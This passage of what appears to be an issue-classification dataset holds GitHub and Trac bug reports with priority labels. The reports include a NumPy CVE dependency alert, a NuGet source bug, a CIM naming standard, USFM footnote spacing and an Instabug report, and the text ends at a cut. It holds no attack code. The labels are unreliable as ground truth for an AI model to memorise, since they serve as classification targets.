glshovel creates zero-size captures (Trac #71) - ```text I'm getting snapshot.jpg Couldn?t open the file. It may be corrupt or a file format that Preview doesn?t recognize. when I try to open in either Preview or PowerPoint. Intel Mac with GLShovel-20070511-x86.dmg. ``` Migrated from https://code.icecube.wisc.edu/ticket/71 ```json { "status": "closed", "changetime": "2007-11-11T03:37:42", "description": "{{{\nI'm getting\n\nsnapshot.jpg\n\nCouldn?t open the file. It may be corrupt or a file format that Preview\ndoesn?t recognize.\n\nwhen I try to open in either Preview or PowerPoint. Intel Mac with\nGLShovel-20070511-x86.dmg.\n\n\n}}}", "reporter": "troy", "cc": "", "resolution": "duplicate", "_ts": "1194752262000000", "component": "glshovel", "summary": "glshovel creates zero-size captures", "priority": "normal", "keywords": "", "time": "2007-06-21T13:14:46", "milestone": "", "owner": "troy", "type": "defect" } ```
non_priority
glshovel creates zero size captures trac text i m getting snapshot jpg couldn t open the file it may be corrupt or a file format that preview doesn t recognize when i try to open in either preview or powerpoint intel mac with glshovel dmg migrated from json status closed changetime description ni m getting n nsnapshot jpg n ncouldn t open the file it may be corrupt or a file format that preview ndoesn t recognize n nwhen i try to open in either preview or powerpoint intel mac with nglshovel dmg n n n reporter troy cc resolution duplicate ts component glshovel summary glshovel creates zero size captures priority normal keywords time milestone owner troy type defect
0
146,538
19,406,160,346
IssuesEvent
2021-12-20 01:12:13
RG4421/featuretools
https://api.github.com/repos/RG4421/featuretools
opened
CVE-2021-33430 (Medium) detected in numpy-1.16.6-cp27-cp27mu-manylinux1_x86_64.whl
security vulnerability
## CVE-2021-33430 - Medium Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>numpy-1.16.6-cp27-cp27mu-manylinux1_x86_64.whl</b></p></summary> <p>NumPy is the fundamental package for array computing with Python.</p> <p>Library home page: <a href="https://files.pythonhosted.org/packages/3a/5f/47e578b3ae79e2624e205445ab77a1848acdaa2929a00eeef6b16eaaeb20/numpy-1.16.6-cp27-cp27mu-manylinux1_x86_64.whl">https://files.pythonhosted.org/packages/3a/5f/47e578b3ae79e2624e205445ab77a1848acdaa2929a00eeef6b16eaaeb20/numpy-1.16.6-cp27-cp27mu-manylinux1_x86_64.whl</a></p> <p>Path to dependency file: featuretools/requirements.txt</p> <p>Path to vulnerable library: featuretools/requirements.txt,featuretools/docs/source</p> <p> Dependency Hierarchy: - :x: **numpy-1.16.6-cp27-cp27mu-manylinux1_x86_64.whl** (Vulnerable Library) <p>Found in base branch: <b>main</b></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Vulnerability Details</summary> <p> A Buffer Overflow vulnerability exists in NumPy 1.9.x in the PyArray_NewFromDescr_int function of ctors.c when specifying arrays of large dimensions (over 32) from Python code, which could let a malicious user cause a Denial of Service. <p>Publish Date: 2021-12-17 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-33430>CVE-2021-33430</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>5.5</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: Required - Scope: Changed - Impact Metrics: - Confidentiality Impact: Low - Integrity Impact: Low - Availability Impact: None </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://nvd.nist.gov/vuln/detail/CVE-2021-33430">https://nvd.nist.gov/vuln/detail/CVE-2021-33430</a></p> <p>Release Date: 2021-12-17</p> <p>Fix Resolution: numpy - 1.21.0</p> </p> </details> <p></p> *** :rescue_worker_helmet: Automatic Remediation is available for this issue <!-- <REMEDIATE>{"isOpenPROnVulnerability":true,"isPackageBased":true,"isDefaultBranch":true,"packages":[{"packageType":"Python","packageName":"numpy","packageVersion":"1.16.6","packageFilePaths":["/requirements.txt","/docs/source"],"isTransitiveDependency":false,"dependencyTree":"numpy:1.16.6","isMinimumFixVersionAvailable":true,"minimumFixVersion":"numpy - 1.21.0","isBinary":false}],"baseBranches":["main"],"vulnerabilityIdentifier":"CVE-2021-33430","vulnerabilityDetails":"A Buffer Overflow vulnerability exists in NumPy 1.9.x in the PyArray_NewFromDescr_int function of ctors.c when specifying arrays of large dimensions (over 32) from Python code, which could let a malicious user cause a Denial of Service.","vulnerabilityUrl":"https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-33430","cvss3Severity":"medium","cvss3Score":"5.5","cvss3Metrics":{"A":"None","AC":"Low","PR":"None","S":"Changed","C":"Low","UI":"Required","AV":"Network","I":"Low"},"extraData":{}}</REMEDIATE> -->
True
CVE-2021-33430 (Medium) detected in numpy-1.16.6-cp27-cp27mu-manylinux1_x86_64.whl - ## CVE-2021-33430 - Medium Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>numpy-1.16.6-cp27-cp27mu-manylinux1_x86_64.whl</b></p></summary> <p>NumPy is the fundamental package for array computing with Python.</p> <p>Library home page: <a href="https://files.pythonhosted.org/packages/3a/5f/47e578b3ae79e2624e205445ab77a1848acdaa2929a00eeef6b16eaaeb20/numpy-1.16.6-cp27-cp27mu-manylinux1_x86_64.whl">https://files.pythonhosted.org/packages/3a/5f/47e578b3ae79e2624e205445ab77a1848acdaa2929a00eeef6b16eaaeb20/numpy-1.16.6-cp27-cp27mu-manylinux1_x86_64.whl</a></p> <p>Path to dependency file: featuretools/requirements.txt</p> <p>Path to vulnerable library: featuretools/requirements.txt,featuretools/docs/source</p> <p> Dependency Hierarchy: - :x: **numpy-1.16.6-cp27-cp27mu-manylinux1_x86_64.whl** (Vulnerable Library) <p>Found in base branch: <b>main</b></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Vulnerability Details</summary> <p> A Buffer Overflow vulnerability exists in NumPy 1.9.x in the PyArray_NewFromDescr_int function of ctors.c when specifying arrays of large dimensions (over 32) from Python code, which could let a malicious user cause a Denial of Service. <p>Publish Date: 2021-12-17 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-33430>CVE-2021-33430</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>5.5</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: Required - Scope: Changed - Impact Metrics: - Confidentiality Impact: Low - Integrity Impact: Low - Availability Impact: None </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://nvd.nist.gov/vuln/detail/CVE-2021-33430">https://nvd.nist.gov/vuln/detail/CVE-2021-33430</a></p> <p>Release Date: 2021-12-17</p> <p>Fix Resolution: numpy - 1.21.0</p> </p> </details> <p></p> *** :rescue_worker_helmet: Automatic Remediation is available for this issue <!-- <REMEDIATE>{"isOpenPROnVulnerability":true,"isPackageBased":true,"isDefaultBranch":true,"packages":[{"packageType":"Python","packageName":"numpy","packageVersion":"1.16.6","packageFilePaths":["/requirements.txt","/docs/source"],"isTransitiveDependency":false,"dependencyTree":"numpy:1.16.6","isMinimumFixVersionAvailable":true,"minimumFixVersion":"numpy - 1.21.0","isBinary":false}],"baseBranches":["main"],"vulnerabilityIdentifier":"CVE-2021-33430","vulnerabilityDetails":"A Buffer Overflow vulnerability exists in NumPy 1.9.x in the PyArray_NewFromDescr_int function of ctors.c when specifying arrays of large dimensions (over 32) from Python code, which could let a malicious user cause a Denial of Service.","vulnerabilityUrl":"https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-33430","cvss3Severity":"medium","cvss3Score":"5.5","cvss3Metrics":{"A":"None","AC":"Low","PR":"None","S":"Changed","C":"Low","UI":"Required","AV":"Network","I":"Low"},"extraData":{}}</REMEDIATE> -->
non_priority
cve medium detected in numpy whl cve medium severity vulnerability vulnerable library numpy whl numpy is the fundamental package for array computing with python library home page a href path to dependency file featuretools requirements txt path to vulnerable library featuretools requirements txt featuretools docs source dependency hierarchy x numpy whl vulnerable library found in base branch main vulnerability details a buffer overflow vulnerability exists in numpy x in the pyarray newfromdescr int function of ctors c when specifying arrays of large dimensions over from python code which could let a malicious user cause a denial of service publish date url a href cvss score details base score metrics exploitability metrics attack vector network attack complexity low privileges required none user interaction required scope changed impact metrics confidentiality impact low integrity impact low availability impact none for more information on scores click a href suggested fix type upgrade version origin a href release date fix resolution numpy rescue worker helmet automatic remediation is available for this issue isopenpronvulnerability true ispackagebased true isdefaultbranch true packages istransitivedependency false dependencytree numpy isminimumfixversionavailable true minimumfixversion numpy isbinary false basebranches vulnerabilityidentifier cve vulnerabilitydetails a buffer overflow vulnerability exists in numpy x in the pyarray newfromdescr int function of ctors c when specifying arrays of large dimensions over from python code which could let a malicious user cause a denial of service vulnerabilityurl
0
166,876
26,419,943,596
IssuesEvent
2023-01-13 19:22:48
NuGet/Home
https://api.github.com/repos/NuGet/Home
closed
Nuget not searching in custom package sources
Type:Bug Resolution:ByDesign Area:Settings
### NuGet Product Used Visual Studio Package Manager Console ### Product Version nuget 6.4.0.117 ### Worked before? seems to work in 6.3.1.1, but on a different laptop ### Impact I'm unable to use this version ### Repro Steps & Context I have added a custom package source. If I search in nuget package manager, I find my package. If I install the package it fails with the following error: ``` Restoring packages for .NETStandard,Version=v2.1... GET https://api.nuget.org/v3-flatcontainer/mypackage.test/index.json NotFound https://api.nuget.org/v3-flatcontainer/mypackage.test/index.json 125ms Resolving conflicts for .NETStandard,Version=v2.1... Unable to find package mypackage.test. No packages exist with this id in source(s): nuget.org Package restore failed. Rolling back package changes for 'FormsApp1'. ``` In the logging I see that package manager only searches in nuget.org and not in my custom sources. I am using VS for mac 17.4.2. NuGet Version: 6.4.0.117 **QUESTION: How do I install a different version of Nuget?** I want to try version 6.3.1.1 to check if this works on the same laptop.
1.0
Nuget not searching in custom package sources - ### NuGet Product Used Visual Studio Package Manager Console ### Product Version nuget 6.4.0.117 ### Worked before? seems to work in 6.3.1.1, but on a different laptop ### Impact I'm unable to use this version ### Repro Steps & Context I have added a custom package source. If I search in nuget package manager, I find my package. If I install the package it fails with the following error: ``` Restoring packages for .NETStandard,Version=v2.1... GET https://api.nuget.org/v3-flatcontainer/mypackage.test/index.json NotFound https://api.nuget.org/v3-flatcontainer/mypackage.test/index.json 125ms Resolving conflicts for .NETStandard,Version=v2.1... Unable to find package mypackage.test. No packages exist with this id in source(s): nuget.org Package restore failed. Rolling back package changes for 'FormsApp1'. ``` In the logging I see that package manager only searches in nuget.org and not in my custom sources. I am using VS for mac 17.4.2. NuGet Version: 6.4.0.117 **QUESTION: How do I install a different version of Nuget?** I want to try version 6.3.1.1 to check if this works on the same laptop.
non_priority
nuget not searching in custom package sources nuget product used visual studio package manager console product version nuget worked before seems to work in but on a different laptop impact i m unable to use this version repro steps context i have added a custom package source if i search in nuget package manager i find my package if i install the package it fails with the following error restoring packages for netstandard version get notfound resolving conflicts for netstandard version unable to find package mypackage test no packages exist with this id in source s nuget org package restore failed rolling back package changes for in the logging i see that package manager only searches in nuget org and not in my custom sources i am using vs for mac nuget version question how do i install a different version of nuget i want to try version to check if this works on the same laptop
0
262,183
19,766,282,675
IssuesEvent
2022-01-17 03:02:54
BC46/freelancer-hd-edition
https://api.github.com/repos/BC46/freelancer-hd-edition
closed
Add new screenshots
documentation
Also record a short video. Put both the video and screenshots on the Mod DB page.
1.0
Add new screenshots - Also record a short video. Put both the video and screenshots on the Mod DB page.
non_priority
add new screenshots also record a short video put both the video and screenshots on the mod db page
0
347,072
24,887,500,647
IssuesEvent
2022-10-28 09:02:39
JovonLim/ped
https://api.github.com/repos/JovonLim/ped
opened
UG should give a bit more details about sale and cost price
severity.Low type.DocumentationBug
Since it selling items, I would assume that sale price should always be higher than cost price, but the current commands allows us to edit cost price to be much higher than sale price. It might be better to add more details in the addi feature so that users would not be confused about the two terms and have some constraints. <!--session: 1666944082128-78d0d8c7-e16c-422d-8e8f-46da6abf38db--> <!--Version: Web v3.4.4-->
1.0
UG should give a bit more details about sale and cost price - Since it selling items, I would assume that sale price should always be higher than cost price, but the current commands allows us to edit cost price to be much higher than sale price. It might be better to add more details in the addi feature so that users would not be confused about the two terms and have some constraints. <!--session: 1666944082128-78d0d8c7-e16c-422d-8e8f-46da6abf38db--> <!--Version: Web v3.4.4-->
non_priority
ug should give a bit more details about sale and cost price since it selling items i would assume that sale price should always be higher than cost price but the current commands allows us to edit cost price to be much higher than sale price it might be better to add more details in the addi feature so that users would not be confused about the two terms and have some constraints
0
116,810
11,942,725,996
IssuesEvent
2020-04-02 21:33:45
ubsicap/usfm
https://api.github.com/repos/ubsicap/usfm
closed
Is the spacing wrong in footnote format examples?
bug documentation
From http://ubsicap.github.io/usfm/master/about/syntax.html#endmarkers-in-footnotes-and-cross-references: ``` \f + \fk Issac:\ft In Hebrew means "laughter"\f* \f + \fk Issac:\fk* \ft In Hebrew means "laughter"\ft*\f* \f + \fr 1.14 \fq religious festivals;\ft or \fqa seasons.\f* \f + \fr 1.14\fr* \fq religious festivals;\fq* or \fqa seasons.\fqa*\f* \f + \fr 2.4 \fk The \+nd Lord\+nd*: \ft See \+nd Lord\+nd* in Word List.\f* \f + \fr 2.4\fr* \fk The \+nd Lord\+nd*:\fk* \ft See \+nd Lord\+nd* in Word List.\ft*\f* ``` Should the first lines of the first two example pairs have a space before the \ft like the third one? (I'm not certain that the first two pairs will produce the same printed result?)
1.0
Is the spacing wrong in footnote format examples? - From http://ubsicap.github.io/usfm/master/about/syntax.html#endmarkers-in-footnotes-and-cross-references: ``` \f + \fk Issac:\ft In Hebrew means "laughter"\f* \f + \fk Issac:\fk* \ft In Hebrew means "laughter"\ft*\f* \f + \fr 1.14 \fq religious festivals;\ft or \fqa seasons.\f* \f + \fr 1.14\fr* \fq religious festivals;\fq* or \fqa seasons.\fqa*\f* \f + \fr 2.4 \fk The \+nd Lord\+nd*: \ft See \+nd Lord\+nd* in Word List.\f* \f + \fr 2.4\fr* \fk The \+nd Lord\+nd*:\fk* \ft See \+nd Lord\+nd* in Word List.\ft*\f* ``` Should the first lines of the first two example pairs have a space before the \ft like the third one? (I'm not certain that the first two pairs will produce the same printed result?)
non_priority
is the spacing wrong in footnote format examples from f fk issac ft in hebrew means laughter f f fk issac fk ft in hebrew means laughter ft f f fr fq religious festivals ft or fqa seasons f f fr fr fq religious festivals fq or fqa seasons fqa f f fr fk the nd lord nd ft see nd lord nd in word list f f fr fr fk the nd lord nd fk ft see nd lord nd in word list ft f should the first lines of the first two example pairs have a space before the ft like the third one i m not certain that the first two pairs will produce the same printed result
0
28,449
13,688,400,861
IssuesEvent
2020-09-30 11:39:47
WordPress/gutenberg
https://api.github.com/repos/WordPress/gutenberg
closed
[Widgets editor] Preload everything
[Feature] Widgets Screen [Status] In Progress [Type] Performance
In #24855 the widgets are preloaded on the editor. If the data travels slowly we get a blank screen for a while. Before this PR we saw the collapsed widget areas and by the time we clicked one the data was there. Now this is not the case anymore. I think we should add a way to let the users know we're doing something. <img width="1099" alt="Screenshot 2020-08-27 at 19 46 49" src="https://user-images.githubusercontent.com/107534/91470978-156a8280-e89e-11ea-946e-a15bb6699f89.png">
True
[Widgets editor] Preload everything - In #24855 the widgets are preloaded on the editor. If the data travels slowly we get a blank screen for a while. Before this PR we saw the collapsed widget areas and by the time we clicked one the data was there. Now this is not the case anymore. I think we should add a way to let the users know we're doing something. <img width="1099" alt="Screenshot 2020-08-27 at 19 46 49" src="https://user-images.githubusercontent.com/107534/91470978-156a8280-e89e-11ea-946e-a15bb6699f89.png">
non_priority
preload everything in the widgets are preloaded on the editor if the data travels slowly we get a blank screen for a while before this pr we saw the collapsed widget areas and by the time we clicked one the data was there now this is not the case anymore i think we should add a way to let the users know we re doing something img width alt screenshot at src
0
295,667
22,265,705,759
IssuesEvent
2022-06-10 07:12:06
digin-energi/Grunnprofil
https://api.github.com/repos/digin-energi/Grunnprofil
closed
Name Standard
documentation
Document the name standard used in the DIGIN10 test model. Everyone that is contributing with model to DIGIN would need to follow this standard. DIGIN might make this a general recommendation for model that is going to be exchanged between utility in Norway. DIGIN will recommend software vendors that are delivering or planning to deliver application software that support CIM to follow this standard either as out of the box or as possibility to be configured. This naming standard if focusing on CIM objects, not all of them are directly connected to physical elements, e.g. cim:Terminal, cim:ConnectivityNode. The first version should focus on the following: - cim:ACLineSegment - cim:BasePower - cim:BaseVoltage - cim:Bay - cim:Breaker - cim:BusbarSection - cim:ConformLoad - cim:ConformLoadGroup - cim:ConnectivityNode - cim:ControlArea - cim:CurrentLimit - cim:Disconnector - cim:EquivalentInjection - cim:Feeder - cim:Fuse - cim:GeographicalRegion - cim:Line - cim:LinearShuntCompensator - cim:LoadArea - cim:LoadBreakSwitch - cim:OperationalLimitSet - cim:OperationalLimitType - cim:PetersenCoil - cim:PowerTransformer - cim:PowerTransformerEnd - cim:RatioTapChanger - cim:RegulatingControl - cim:SubGeographicalRegion - cim:SubLoadArea - cim:Substation - cim:TapChangerControl - cim:Terminal - cim:VoltageLevel -
1.0
Name Standard - Document the name standard used in the DIGIN10 test model. Everyone that is contributing with model to DIGIN would need to follow this standard. DIGIN might make this a general recommendation for model that is going to be exchanged between utility in Norway. DIGIN will recommend software vendors that are delivering or planning to deliver application software that support CIM to follow this standard either as out of the box or as possibility to be configured. This naming standard if focusing on CIM objects, not all of them are directly connected to physical elements, e.g. cim:Terminal, cim:ConnectivityNode. The first version should focus on the following: - cim:ACLineSegment - cim:BasePower - cim:BaseVoltage - cim:Bay - cim:Breaker - cim:BusbarSection - cim:ConformLoad - cim:ConformLoadGroup - cim:ConnectivityNode - cim:ControlArea - cim:CurrentLimit - cim:Disconnector - cim:EquivalentInjection - cim:Feeder - cim:Fuse - cim:GeographicalRegion - cim:Line - cim:LinearShuntCompensator - cim:LoadArea - cim:LoadBreakSwitch - cim:OperationalLimitSet - cim:OperationalLimitType - cim:PetersenCoil - cim:PowerTransformer - cim:PowerTransformerEnd - cim:RatioTapChanger - cim:RegulatingControl - cim:SubGeographicalRegion - cim:SubLoadArea - cim:Substation - cim:TapChangerControl - cim:Terminal - cim:VoltageLevel -
non_priority
name standard document the name standard used in the test model everyone that is contributing with model to digin would need to follow this standard digin might make this a general recommendation for model that is going to be exchanged between utility in norway digin will recommend software vendors that are delivering or planning to deliver application software that support cim to follow this standard either as out of the box or as possibility to be configured this naming standard if focusing on cim objects not all of them are directly connected to physical elements e g cim terminal cim connectivitynode the first version should focus on the following cim aclinesegment cim basepower cim basevoltage cim bay cim breaker cim busbarsection cim conformload cim conformloadgroup cim connectivitynode cim controlarea cim currentlimit cim disconnector cim equivalentinjection cim feeder cim fuse cim geographicalregion cim line cim linearshuntcompensator cim loadarea cim loadbreakswitch cim operationallimitset cim operationallimittype cim petersencoil cim powertransformer cim powertransformerend cim ratiotapchanger cim regulatingcontrol cim subgeographicalregion cim subloadarea cim substation cim tapchangercontrol cim terminal cim voltagelevel
0
243,998
20,601,957,714
IssuesEvent
2022-03-06 12:03:10
mennaelkashef/eShop
https://api.github.com/repos/mennaelkashef/eShop
opened
No description entered by the user.
Hello! RULE-GOT-APPLIED DOES-NOT-CONTAIN-STRING Rule-works-on-convert-to-bug test instabug
# :clipboard: Bug Details >No description entered by the user. key | value --|-- Reported At | 2022-03-06 12:01:58 UTC Email | teg@ghh.hhf Categories | Report a bug Tags | test, Hello!, RULE-GOT-APPLIED, DOES-NOT-CONTAIN-STRING, Rule-works-on-convert-to-bug, instabug App Version | 1.1 (1) Session Duration | 9 Device | Google Pixel 5a, OS Level 30 Display | 1080x2400 (xhdpi) Location | Cairo, Egypt (en) ## :point_right: [View Full Bug Report on Instabug](https://dashboard.instabug.com/applications/android-sample/beta/bugs/8605?utm_source=github&utm_medium=integrations) :point_left: ___ # :iphone: View Hierarchy This bug was reported from **com.example.app.main.MainFragment** Find its interactive view hierarchy with all its subviews here: :point_right: **[Check View Hierarchy](https://dashboard.instabug.com/applications/android-sample/beta/bugs/8605?show-hierarchy-view=true&utm_source=github&utm_medium=integrations)** :point_left: ___ # :chart_with_downwards_trend: Session Profiler Here is what the app was doing right before the bug was reported: Key | Value --|-- Used Memory | 47.9% - 2.55/5.33 GB Used Storage | 12.8% - 13.98/109.11 GB Connectivity | WiFi Battery | 100% - plugged Orientation | portrait Find all the changes that happened in the parameters mentioned above during the last 60 seconds before the bug was reported here: :point_right: **[View Full Session Profiler](https://dashboard.instabug.com/applications/android-sample/beta/bugs/8605?show-session-profiler=true&utm_source=github&utm_medium=integrations)** :point_left: ___ # :bust_in_silhouette: User Info ### User Attributes ``` key_name -304083571: key value bla bla bla la ``` ___ # :mag_right: Logs ### User Steps Here are the last 10 steps done by the user right before the bug was reported: ``` 12:01:51 In activity com.example.app.main.MainActivity: fragment com.example.app.main.MainFragment was created. 12:01:51 In activity com.example.app.main.MainActivity: fragment com.example.app.main.MainFragment was started. 12:01:51 In activity com.example.app.main.MainActivity: fragment com.example.app.main.MainFragment was resumed. 12:01:51 com.example.app.main.MainActivity was resumed. 12:01:52 com.example.app.splash.SplashActivity was stopped. 12:01:52 com.example.app.splash.SplashActivity was destroyed. 12:01:56 Tap in "androidx.constraintlayout.widget.ConstraintLayout" in "com.example.app.main.MainActivity" 12:01:57 com.example.app.main.MainActivity was paused. 12:01:57 In activity com.example.app.main.MainActivity: fragment com.example.app.main.MainFragment was paused. 12:01:57 Tap in "androidx.constraintlayout.widget.ConstraintLayout" in "com.example.app.main.MainActivity" ``` Find all the user steps done by the user throughout the session here: :point_right: **[View All User Steps](https://dashboard.instabug.com/applications/android-sample/beta/bugs/8605?show-logs=user_steps&utm_source=github&utm_medium=integrations)** :point_left: ### Console Log Here are the last 10 console logs logged right before the bug was reported: ``` 12:02:03 D/StrictMode(24974): at com.android.okhttp.internal.huc.HttpsURLConnectionImpl.getResponseCode(HttpsURLConnectionImpl.java:30) 12:02:03 D/StrictMode(24974): at com.instabug.apm.networkinterception.b.getResponseCode(Unknown Source:2) 12:02:03 D/StrictMode(24974): at com.instabug.library.networkv2.NetworkManager.handleRequest(NetworkManager.java:44) 12:02:03 D/StrictMode(24974): at com.instabug.library.networkv2.NetworkManager.lambda$doRequest$0$NetworkManager(NetworkManager.java:1) 12:02:03 D/StrictMode(24974): at com.instabug.library.networkv2.NetworkManager$$ExternalSyntheticLambda0.run(Unknown Source:8) 12:02:03 D/StrictMode(24974): at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1167) 12:02:03 D/StrictMode(24974): at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:641) 12:02:03 D/StrictMode(24974): at com.instabug.library.util.threading.d$a.run(PriorityThreadFactory.java:8) 12:02:03 D/StrictMode(24974): ... 1 more 12:02:03 D/IB-AttachmentsUtility(24974): encryptAttachments ``` Find all the logged console logs throughout the session here: :point_right: **[View All Console Log](https://dashboard.instabug.com/applications/android-sample/beta/bugs/8605?show-logs=console_log&utm_source=github&utm_medium=integrations)** :point_left: ___ # :camera: Images [![image attachment](https://d38gnqwzxziyyy.cloudfront.net/attachments/bugs/17964813/11bce2bba325c3e8f6cb8ac8fc0ca237_one_bug_thumb/25256022/bug_1646568116972_.jpg?Expires=4802241789&Signature=DBHH1Un63Flb9CYmx6fABxQcwDGymS3Pxb0VVfAidU3RdGSZJS69rA7kd0sg-e8IEOtmjMDzEwoq58oWUfMP9G5e-q1mD1pWizmVhsJ~j53QBLTiLJkzud3Kmz8iXStzCEZCz33h52Sar3H~nMrYUOY30ABcE5nJb4tRhQVi-GeXwe9PKYHDbGzaf3bEz5sHI8Qh3AKOoTFoR9O0BjOOjvSViPEiTWqGrACBt8rXFSMr5Yv4Ympe3Es5GKriW0IYxZ6RNPhdLdCsR2kmgCy7XhR8Y5oXmNjOKmkX2s3dGMITm8C-wraJzdWmW1wV~O3VG3X3ERCw88xDC32s49LIdQ__&Key-Pair-Id=APKAIXAG65U6UUX7JAQQ)](https://d38gnqwzxziyyy.cloudfront.net/attachments/bugs/17964813/11bce2bba325c3e8f6cb8ac8fc0ca237_original/25256022/bug_1646568116972_.jpg?Expires=4802241788&Signature=d-X-UETdDieLjvRej24epfqc0YjH6lGarmcASoOEpexrwOf3D7aN4zOCjWGI1TD7YFOFcJ60CEE1-XLBSAJRFASQMc-YCHRms3tFbfB1Z1Z2GeyCCdOuacF2HHC-MFn7Vxal3hP--KL1TuD7l5FDZlzr~mG0xJVGzNtOOwoOZ3uKUrM5ca6KtKbzJgNwaNoWRq0h7gUVJbLPiOMw9dP6h2Ql14OE5rPlABqW2XvZayODK~QG5iuYRqUOlah-qcRyB~DQZc4S~hF17ZNLKGWYkJde9NXaZgDXh2VjEjirEKe1AYWatw84wMlv0SyUIGk7kOhFv2DGwcXsupAGd1O-1A__&Key-Pair-Id=APKAIXAG65U6UUX7JAQQ) ___ # :warning: Looking for More Details? 1. **Network Log**: we are unable to capture your network requests automatically. If you are using HttpUrlConnection or Okhttp requests, [**check the details mentioned here**](https://docs.instabug.com/docs/android-logging?utm_source=github&utm_medium=integrations#section-network-logs). 2. **User Events**: start capturing custom User Events to send them along with each report. [**Find all the details in the docs**](https://docs.instabug.com/docs/android-logging?utm_source=github&utm_medium=integrations). 3. **Instabug Log**: start adding Instabug logs to see them right inside each report you receive. [**Find all the details in the docs**](https://docs.instabug.com/docs/android-logging?utm_source=github&utm_medium=integrations).
1.0
No description entered by the user. - # :clipboard: Bug Details >No description entered by the user. key | value --|-- Reported At | 2022-03-06 12:01:58 UTC Email | teg@ghh.hhf Categories | Report a bug Tags | test, Hello!, RULE-GOT-APPLIED, DOES-NOT-CONTAIN-STRING, Rule-works-on-convert-to-bug, instabug App Version | 1.1 (1) Session Duration | 9 Device | Google Pixel 5a, OS Level 30 Display | 1080x2400 (xhdpi) Location | Cairo, Egypt (en) ## :point_right: [View Full Bug Report on Instabug](https://dashboard.instabug.com/applications/android-sample/beta/bugs/8605?utm_source=github&utm_medium=integrations) :point_left: ___ # :iphone: View Hierarchy This bug was reported from **com.example.app.main.MainFragment** Find its interactive view hierarchy with all its subviews here: :point_right: **[Check View Hierarchy](https://dashboard.instabug.com/applications/android-sample/beta/bugs/8605?show-hierarchy-view=true&utm_source=github&utm_medium=integrations)** :point_left: ___ # :chart_with_downwards_trend: Session Profiler Here is what the app was doing right before the bug was reported: Key | Value --|-- Used Memory | 47.9% - 2.55/5.33 GB Used Storage | 12.8% - 13.98/109.11 GB Connectivity | WiFi Battery | 100% - plugged Orientation | portrait Find all the changes that happened in the parameters mentioned above during the last 60 seconds before the bug was reported here: :point_right: **[View Full Session Profiler](https://dashboard.instabug.com/applications/android-sample/beta/bugs/8605?show-session-profiler=true&utm_source=github&utm_medium=integrations)** :point_left: ___ # :bust_in_silhouette: User Info ### User Attributes ``` key_name -304083571: key value bla bla bla la ``` ___ # :mag_right: Logs ### User Steps Here are the last 10 steps done by the user right before the bug was reported: ``` 12:01:51 In activity com.example.app.main.MainActivity: fragment com.example.app.main.MainFragment was created. 12:01:51 In activity com.example.app.main.MainActivity: fragment com.example.app.main.MainFragment was started. 12:01:51 In activity com.example.app.main.MainActivity: fragment com.example.app.main.MainFragment was resumed. 12:01:51 com.example.app.main.MainActivity was resumed. 12:01:52 com.example.app.splash.SplashActivity was stopped. 12:01:52 com.example.app.splash.SplashActivity was destroyed. 12:01:56 Tap in "androidx.constraintlayout.widget.ConstraintLayout" in "com.example.app.main.MainActivity" 12:01:57 com.example.app.main.MainActivity was paused. 12:01:57 In activity com.example.app.main.MainActivity: fragment com.example.app.main.MainFragment was paused. 12:01:57 Tap in "androidx.constraintlayout.widget.ConstraintLayout" in "com.example.app.main.MainActivity" ``` Find all the user steps done by the user throughout the session here: :point_right: **[View All User Steps](https://dashboard.instabug.com/applications/android-sample/beta/bugs/8605?show-logs=user_steps&utm_source=github&utm_medium=integrations)** :point_left: ### Console Log Here are the last 10 console logs logged right before the bug was reported: ``` 12:02:03 D/StrictMode(24974): at com.android.okhttp.internal.huc.HttpsURLConnectionImpl.getResponseCode(HttpsURLConnectionImpl.java:30) 12:02:03 D/StrictMode(24974): at com.instabug.apm.networkinterception.b.getResponseCode(Unknown Source:2) 12:02:03 D/StrictMode(24974): at com.instabug.library.networkv2.NetworkManager.handleRequest(NetworkManager.java:44) 12:02:03 D/StrictMode(24974): at com.instabug.library.networkv2.NetworkManager.lambda$doRequest$0$NetworkManager(NetworkManager.java:1) 12:02:03 D/StrictMode(24974): at com.instabug.library.networkv2.NetworkManager$$ExternalSyntheticLambda0.run(Unknown Source:8) 12:02:03 D/StrictMode(24974): at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1167) 12:02:03 D/StrictMode(24974): at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:641) 12:02:03 D/StrictMode(24974): at com.instabug.library.util.threading.d$a.run(PriorityThreadFactory.java:8) 12:02:03 D/StrictMode(24974): ... 1 more 12:02:03 D/IB-AttachmentsUtility(24974): encryptAttachments ``` Find all the logged console logs throughout the session here: 